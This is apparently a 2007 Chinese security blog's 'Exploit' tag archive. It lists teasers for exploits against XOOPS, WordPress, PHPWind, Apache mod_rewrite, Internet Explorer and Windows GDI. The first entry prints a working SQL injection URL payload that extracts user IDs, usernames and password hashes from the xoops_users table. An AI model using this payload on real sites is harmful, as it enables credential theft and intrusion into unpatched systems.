标签 ‘Exploit’ 下的日志

oops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

2007/04/15 8:36 | 鬼仔 | 技术文章 | 消灭0回复

构造url语句:

/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*


Tags: , , , ,

IE (79+ Exes) NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit

2007/04/14 11:19 | 鬼仔 | 工具收集 | 3 个回复

来源:milw0rm
阅读全文 »

Tags: , ,

MS Windows GDI Local Privilege Escalation Exploit (MS07-017)

2007/04/11 11:30 | 鬼仔 | 工具收集 | 消灭0回复

阅读全文 »

Tags: ,

Vuln Review: Apache Mod_Rewrite Off-by-one Remote Exploit(Win32)

2007/04/08 9:58 | 鬼仔 | 技术文章 | 消灭0回复

by axis
Date: 2007-04-07
http://www.ph4nt0m.org

上次在irc里演示另外一个漏洞获得的cmd banner,结果被swan大牛误以为是这个漏洞,于是最近利用闲暇时间,跟了一下这个漏洞。
这个漏洞在windows上似乎非常通用,直接就跑去运行我的shellcode了,就是shellcode有些限制。

不过该漏洞对于服务器的条件有些限制

* The RewriteRule allows the attacker to control the initial part of the rewritten URL (for example if the substitution URL starts with $1)
阅读全文 »

Tags: ,

魔力论坛EXP

2007/04/06 5:28 | 鬼仔 | 技术文章 | 3 个回复

来源:小米's Blog

阅读全文 »

Tags: ,

[0day] PHPWind 5.x Exploits GUI版+命令行版

2007/04/06 3:57 | 鬼仔 | 工具收集 | 消灭0回复

来源:Neeao's Blog

—————————————————————–
| PHPWind 5.x Exploits |
| |
| Powered by HamFast V1.12 20070101 |
| |

阅读全文 »

Tags: ,

WordPress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

2007/04/04 7:23 | 鬼仔 | 工具收集 | 消灭0回复

昨天刚看到Wordpress发布2.1.3的消息,说是一个重要的安全更新版本,今天就看到这个。

来源:milw0rm

阅读全文 »

Tags: , , ,

MS Internet Explorer Recordset Double Free Memory Exploit (MS07-009)

2007/03/27 11:54 | 鬼仔 | 技术文章 | 消灭0回复

来源:milw0rm.com

阅读全文 »

Tags: ,